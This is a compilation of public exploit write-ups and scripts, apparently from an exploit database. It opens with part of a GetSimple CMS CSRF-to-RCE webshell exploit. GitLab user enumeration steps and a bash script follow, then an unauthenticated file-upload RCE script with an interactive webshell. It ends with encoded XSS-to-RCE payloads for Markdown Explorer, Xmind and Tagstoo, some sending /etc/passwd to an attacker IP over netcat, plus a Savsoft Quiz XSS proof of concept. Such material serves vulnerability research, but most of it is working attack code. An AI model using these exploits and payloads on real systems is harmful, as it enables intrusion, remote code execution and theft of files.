'var u="/admin/theme-edit.php";' payload += 'var xhr1=new XMLHttpRequest();' payload += 'var xhr2=new XMLHttpRequest();' payload += 'xhr1.onreadystatechange=function(){' payload += 'if(xhr1.readyState==4 && xhr1.status==200){' payload += 'r=this.responseXML;' payload += 'nVal=r.querySelector("#nonce").value;' payload += 'eVal=r.forms[1][2].defaultValue;' payload += 'xhr2.open("POST",u,true);' payload += 'xhr2.setRequestHeader("Content-Type",h);' payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);' payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' payload += 'xhr2.send(params);' payload += '}};' payload += 'xhr1.open("GET",u,true);' payload += 'xhr1.responseType="document";' payload += 'xhr1.send();' return payload def csrfPayload(): payload = '<html><body>' payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">' payload += '<input type="hidden" name="customjs_url_content" value="">' payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">' payload += '<input type="hidden" name="submit" value="Save Settings">' payload += '<input type="submit" value="Submit request">' payload += '</form></body></html>' return payload class S(BaseHTTPRequestHandler): def do_GET(self): victim = self.client_address victim = "{}:{}".format(victim[0],victim[1]) print("{}{} connected to Malicious CSRF Site!".format(ok,victim)) print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info)) self.wfile.write("{}".format(csrfPayload()).encode('utf-8')) def run(server_class=HTTPServer, handler_class=S, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) print('{}Hosting CSRF attack & listening for admin to connect..'.format(info)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print('Stopping httpd...') def tryUploadWebshell(target,page): try: blind = target+page # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt) webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"} requests.post(url=blind, data=webshUpload, verify=False) except: pass def checkWebshell(target): try: websh = "{}/webshell.php".format(target) capsule = {'FierceGodKick':'pwnt?'} resp = requests.post(url=websh, data=capsule, verify=False) return resp.status_code except: pass def sig(): SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n" SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n" SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n" SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n" SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n" SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n" SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST return SIG def argsetup(): about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter) desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB parser.add_argument('Target',type=str,help=desc1) desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST parser.add_argument('PublicPage',type=str,help=desc2) args = parser.parse_args() return args if __name__ == '__main__': header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n' header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST print(header) args = argsetup() target = args.Target page = args.PublicPage print(sig()) theTHREADER() pwnt = checkWebshell(target) if pwnt != 200: while pwnt != 200: sleep(3) tryUploadWebshell(target,page) sleep(2) pwnt = checkWebshell(target) print("{} A wild webshell appears!".format(ok)) webshell(target)

# Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up]. DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk. STEPS: The required steps for this purpose are as follows: 1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username 2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow: ---------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /users/testuser/exists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/users/sign_up X-CSRF-Token: <some value> X-Requested-With: XMLHttpRequest Connection: close Cookie: experimentation_subject_id=<some value>; known_sign_in=<some value>; _gitlab_session=<some value> ---------------------------------------------------------------------------------------------------------------------------------------------------------------- * note that the tested username (testuser) is in URI 3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter. 4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples: -------------------------------------------The following response belongs to a valid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:52:44 GMT Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"8063e5a51719c58189c7d5209a5f37b3" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F X-Runtime: 0.221557 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":true} -------------------------------------------The following response belongs to an invalid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:55:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 16 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"e39f603a5ebcff23859d200f9c9dc20f" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0 X-Runtime: 0.033046 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":false}

# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 #!/bin/bash #Colors RED='\033[38;5;196m' GREEN='\e[38;5;47m' NC='\033[0m' BOLD='\e[1m' PINK='\e[38;5;198m' Italic='\e[3m' BBlue='\e[44m' YELLOW='\033[0;33m' clear echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" echo -e " ${BOLD}Version 1.0${NC}\n" echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" echo -e "right permission is totally on your own risk.\n${NC}" echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" # Usage usage() { echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n" echo -e "${Italic}PARAMETERS:${NC}" echo -e "-------------" echo -e "-u/--url The URL of your victim's GitLab instance" echo -e "--userlist Path to a username wordlist file (one per line)" echo -e "-h/--help Show this help message and exit" echo -e "\n" echo -e "${Italic}Example:${NC}" echo -e "-------------" echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" } #check for params args=("$@") URL="" user_list="" for (( i=0; i < $#; i++)) { case ${args[$i]} in --url | -u) #GitLab's URL URL=${args[$((i+1))]} ;; --userlist) #Username wordlist user_list=${args[$((i+1))]} ;; -h | --help | "") #Help Menu usage exit 0 ;; esac } ## checking the mandatory parameter (URL) if [ -z "$URL" ] then usage echo "" echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" exit 0 fi # User Enumeration Function enumeration(){ while IFS= read -r line do echo "LOOP" HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) echo $HTTP_Code #echo "\n" if [ $HTTP_Code -eq 200 ] then echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" #check the connection elif [ $HTTP_Code -eq 000 ] then echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" exit 0 fi done < "$user_list" } # Main enumeration

# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argenestel # Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: Debian 10 import requests import time #change the url to the site running the vulnerable system url="http://127.0.0.1:4000" #burp proxy proxies = { "http": "http://127.0.0.1:8080", } #payload payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>' #the upload point insert_url=url+"/inserty.php" def fill_details(): global payload global shellend global shellstart print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload") #time start shellstart=int(time.time()) #print(shellstart) files = {'file':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "company_name":"some", "first_name":"some", "last_name":"some", "email":"[email protected]", "gender":"Male", "insert_button":"Apply", "terms":"on" } r = requests.post(insert_url, data=data, files=files) if r.status_code == 200: print("Exploited Intern System Successfully...") shellend = int(time.time()) #print(shellend) shell() else: print("Exploit Failed") def shell(): for shellname in range(shellstart, shellend+1): shellstr=str(shellname) shell_url=url+"/upload/"+shellstr+"_shell.php" r = requests.get(shell_url) if r.status_code == 200: shell_url=url+"/upload/"+shellstr+"_shell.php" break r = requests.get(shell_url) if r.status_code == 200: print("Shell Starting...") while True: cmd=input("cmd$ ") r = requests.get(shell_url+"?cmd="+cmd) print(r.text) else: print("File Name Error") fill_details()

# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jersou/markdown-explorer # Version: 0.1.1 # Tested on: Windows, Linux, MacOs # Software Description: Easily explore, view and edit markdown documentation of a file tree. If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content. Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof https://imgur.com/a/w4bcPWs # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

# Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting # Date: 2021-05-04 # Exploit Author: strider # Software Link: https://github.com/savsofts/savsoftquiz_v5 # Vendor: https://savsoftquiz.com # Version: 5.0 # Tested on: Ubuntu 20.04 LTS / Kali Linux ====================================[Description]==================================== The vulnerability is found at the user settings page where the user can change his name and his login credentials. its possible to inject html/js into the fields which will be executed after pressing submit. ====================================[Proof of Concept]==================================== If you installed this software create a new user or you can use the default user shown in the install description test-link: http://192.168.1.109/index.php/user/edit_user/<userid> step1) login into an account step2) click on the top right on you account name and navigate to "My Account" step3) insert "><script>alert(document.cookie);</script> into the fields and hit submit boom!

# Exploit Title: Xmind 2020 - XSS to RCE # Exploit Author: TaurusOmar # Date: May 4th, 2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://www.xmind.net/ # Version: 2020 # Tested on: Windows, Linux, MacOs # Software Description: XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it. Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run. # Vulnerability Description: The software allows you to store payloads in the form of files or as custom header titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/t96Nxo5 # Payload 2: exec(/etc/passwd) #Decode Payload <script> const { spawn } = require("child_process"); const cat = spawn("cat", ["/etc/passwd"]); cat.stdout.on("data", data => { alert(`stdout: ${data}`); });</script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # File Malicious.json Payload [{"id":"5609f1388fd8c10e8f8798f104","class":"sheet","title":"Map 1","rootTopic":{"id":"b9aa22deba98b3b20c7ac8aca2","class":"topic","title":"\">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,108,101,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,108,101,116,32,108,115,32,61,32,115,112,97,119,110,40,34,108,115,34,44,32,91,34,45,108,97,34,93,41,59,10,108,115,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,125,41,59,60,47,115,99,114,105,112,116,62,10,10))>","structureClass":"org.xmind.ui.map.unbalanced","children":{"attached":[{"id":"b58888b5ceebbf0e68dada0656","title":"Main Topic 1","titleUnedited":true},{"id":"193b56735e689ae86a01d91513","title":"Main Topic 2","titleUnedited":true},{"id":"67ddbcb1-85c9-4478-a0aa-580e9fdcd971","title":"Main Topic 3","titleUnedited":true}]},"extensions":[{"content":[{"content":"3","name":"right-number"}],"provider":"org.xmind.ui.map.unbalanced"}]},"theme":{"id":"c669ec6d4d48895260d968fc99","importantTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#FFDC34"}},"minorTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#AB9738"}},"expiredTopic":{"type":"topic","properties":{"fo:font-style":"italic","fo:text-decoration":" line-through"}},"centralTopic":{"type":"topic","styleId":"9a13b7d6-cd05-44c3-b903-6c3a50edc46e","properties":{"shape-class":"org.xmind.topicShape.roundedRect","svg:fill":"#1B1B1D","fo:font-family":"Montserrat","fo:font-weight":"600","fo:font-style":"normal","line-width":"3","line-color":"#292929","border-line-width":"0"}},"map":{"type":"map","styleId":"f0e1f9bb-a8f5-486a-a70a-b72b2b6560d3","properties":{"svg:fill":"#000000"}},"subTopic":{"type":"topic","styleId":"9ea90eed-1da0-4c93-bac4-2085e16a0faf","properties":{"fo:font-family":"Montserrat","svg:fill":"#636366","shape-class":"org.xmind.topicShape.roundedRect","fo:font-size":"14pt","fo:text-align":"left","border-line-width":"0","fo:color":"#FFFFFF"}},"mainTopic":{"type":"topic","styleId":"42065f7f-018c-4eb9-9dc7-3a7bbf464915","properties":{"fo:font-family":"Montserrat","svg:fill":"#3A3A3C","border-line-width":"0","fo:font-weight":"600","fo:font-style":"normal","fo:font-size":"18pt","fo:text-align":"left","fo:color":"#FFFFFF","line-width":"2"}},"summaryTopic":{"type":"topic","styleId":"c8f4c32b-2607-4fae-bb85-b8736039e941","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-weight":"500","fo:font-style":"normal","line-color":"#292929","border-line-width":"0"}},"calloutTopic":{"type":"topic","styleId":"6f8bd667-fb82-4d0d-899f-05dc76c5945e","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-size":"14pt","fo:font-weight":"500","fo:font-style":"normal"}},"floatingTopic":{"type":"topic","styleId":"c9509bc2-2641-4f5f-8b38-e62c14c907f9","properties":{"fo:font-family":"Montserrat","border-line-width":"0","fo:font-weight":"500","fo:font-style":"normal","line-width":"2","line-color":"#292929"}},"boundary":{"type":"boundary","styleId":"0d7cf959-3b54-4849-88e1-cc0fc8c60341","properties":{"svg:fill":"#545455","shape-class":"org.xmind.boundaryShape.roundedRect","line-color":"#5D5D60","fo:font-weight":"500","fo:font-style":"normal","fo:color":"#FFFFFF","fo:font-size":"13pt","fo:font-family":"Montserrat"}},"relationship":{"type":"relationship","styleId":"57da2f8e-3f8d-47ee-a802-93023fc802c1","properties":{"line-color":"#8E8E93","line-width":"2","fo:font-weight":"500","fo:font-style":"normal","fo:font-family":"Montserrat","fo:color":"#FFFFFF","fo:font-size":"13pt"}},"summary":{"type":"summary","styleId":"ddeb9d94-1678-4129-8796-42b036e08dd2","properties":{"line-color":"#5A5A5A"}}},"topicPositioning":"fixed"}]

# Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://tagstoo.sourceforge.io/ # Version: v2.0.1 # Tested on: Windows, Linux, MacOs # Software Description: Software to tag folders and files, with multimedia and epubs preview. You can export data with the tagging information to a file, as backup or to import it in any computer. # Vulnerability Description: The software allows you to store payloads in the form of files or custom tags, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer or directly open the folder in the program. # Proof video https://imgur.com/a/smeAjaW # Payload 1: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(netcat remote stolen file => /etc/passwd) #Decode Payload <audio src=x onerror="const exec= require('child_process').exec; exec('nc -w 3 192.168.111.129 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr);}); alert('1')"> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62))>

